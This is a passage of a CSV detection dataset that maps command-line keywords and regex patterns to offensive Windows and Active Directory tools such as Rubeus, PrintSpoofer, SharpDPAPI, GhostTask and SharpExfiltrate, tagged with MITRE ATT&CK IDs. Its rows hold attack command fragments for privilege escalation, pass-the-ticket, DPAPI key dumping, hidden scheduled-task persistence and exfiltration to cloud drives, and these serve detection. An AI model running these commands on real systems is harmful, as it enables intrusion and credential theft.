tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","75","17","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" "*.exe -d 1 -c cmd.exe*",".{0,1000}\.exe\s\-d\s1\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe -d 3 -c *powershell -ep bypass*",".{0,1000}\.exe\s\-d\s3\s\-c\s.{0,1000}powershell\s\-ep\sbypass.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe DCSync -action list*",".{0,1000}\.exe\sDCSync\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe DCSync -action write -target *",".{0,1000}\.exe\sDCSync\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe DomainGPPPassword*",".{0,1000}\.exe\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe DontReqPreAuth -action list*",".{0,1000}\.exe\sDontReqPreAuth\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe DontReqPreAuth -action write -target *",".{0,1000}\.exe\sDontReqPreAuth\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe dump /luid:0x5379f2 /nowrap*",".{0,1000}\.exe\sdump\s\/luid\:0x5379f2\s\/nowrap.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe elevatecmd runassystem *",".{0,1000}\.exe\selevatecmd\srunassystem\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe --eventviewer *.exe*",".{0,1000}\.exe\s\-\-eventviewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe exec * cmd interactive*",".{0,1000}\.exe\sexec\s.{0,1000}\scmd\sinteractive.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*.exe exec hide *",".{0,1000}\.exe\sexec\shide\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe --exec --pid * --prog *cmd.exe*",".{0,1000}\.exe\s\-\-exec\s\-\-pid\s.{0,1000}\s\-\-prog\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*.exe Get-DomainController -Domain * -Server * -Credential *",".{0,1000}\.exe\sGet\-DomainController\s\-Domain\s.{0,1000}\s\-Server\s.{0,1000}\s\-Credential\s.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*.exe -gettgs -luid:*",".{0,1000}\.exe\s\-gettgs\s\-luid\:.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*.exe --get-users-list > *",".{0,1000}\.exe\s\-\-get\-users\-list\s\>\s.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*.exe gmsainfo --sid *",".{0,1000}\.exe\sgmsainfo\s\-\-sid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*",".{0,1000}\.exe\sGoogleDrive\s\-\-appname\s.{0,1000}\s\-\-accesstoken\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}\s\-\-memoryonly.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe --gpo --filter admin --domain*",".{0,1000}\.exe\s\-\-gpo\s\-\-filter\sadmin\s\-\-domain.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*.exe -group=all *",".{0,1000}\.exe\s\-group\=all\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=all -AuditPolicies*",".{0,1000}\.exe\s\-group\=all\s\-AuditPolicies.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=all -full*",".{0,1000}\.exe\s\-group\=all\s\-full.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=remote *",".{0,1000}\.exe\s\-group\=remote\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=system *",".{0,1000}\.exe\s\-group\=system\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=user *",".{0,1000}\.exe\s\-group\=user\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe hash /password:*",".{0,1000}\.exe\shash\s\/password\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*.exe HijackablePaths*",".{0,1000}\.exe\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe -i -c powershell.exe*",".{0,1000}\.exe\s\-i\s\-c\spowershell\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe --impersonate --pid *",".{0,1000}\.exe\s\-\-impersonate\s\-\-pid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*.exe kdsinfo --guid *",".{0,1000}\.exe\skdsinfo\s\-\-guid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*.exe krbscm -c *cmd.exe*",".{0,1000}\.exe\skrbscm\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{B91D5831\-B1BD\-4608\-8198\-D72E155020F7\}.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{F7FD3FD6\-9994\-452D\-8DA7\-9A8FD87AEEF4\}\s\-a.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*.exe --LDAPs --DisableSigning*",".{0,1000}\.exe\s\-\-LDAPs\s\-\-DisableSigning.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *daily*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}daily.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *logon*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}logon.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *second*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}second.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *weekly*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}weekly.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe localhost add * ""cmd.exe"" ""/c *"" *weekly*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}weekly.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*.exe machinetriage*",".{0,1000}\.exe\smachinetriage.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe masterkeys /hashes*",".{0,1000}\.exe\smasterkeys\s\/hashes.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe masterkeys /hashes*",".{0,1000}\.exe\smasterkeys\s\/hashes.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe McAfeeSitelistFiles*",".{0,1000}\.exe\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.EXE Meterpreter Reverse HTTP and HTTPS loader*",".{0,1000}\.EXE\sMeterpreter\sReverse\sHTTP\sand\sHTTPS\sloader.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*.exe ModifiableScheduledTask*",".{0,1000}\.exe\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ModifiableServiceBinaries*",".{0,1000}\.exe\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ModifiableServiceRegistryKeys*",".{0,1000}\.exe\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ModifiableServices*",".{0,1000}\.exe\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe monitor /interval:5 /nowrap",".{0,1000}\.exe\smonitor\s\/interval\:5\s\/nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe NonstandardProcesses*",".{0,1000}\.exe\sNonstandardProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe NTLMSettings*",".{0,1000}\.exe\sNTLMSettings.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe OneDrive --username * --password * --filepath *\*.exe*",".{0,1000}\.exe\sOneDrive\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-filepath\s.{0,1000}\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe --override-file --source-file *.exe*",".{0,1000}\.exe\s\-\-override\-file\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe --path C:\ -r --method VirtualAlloc*",".{0,1000}\.exe\s\-\-path\sC\:\\\s\-r\s\-\-method\sVirtualAlloc.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*.exe ProcessDLLHijack*",".{0,1000}\.exe\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe ptt /ticket:*",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe ptt /ticket:*.kirbi",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}\.kirbi","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*.exe -ptt 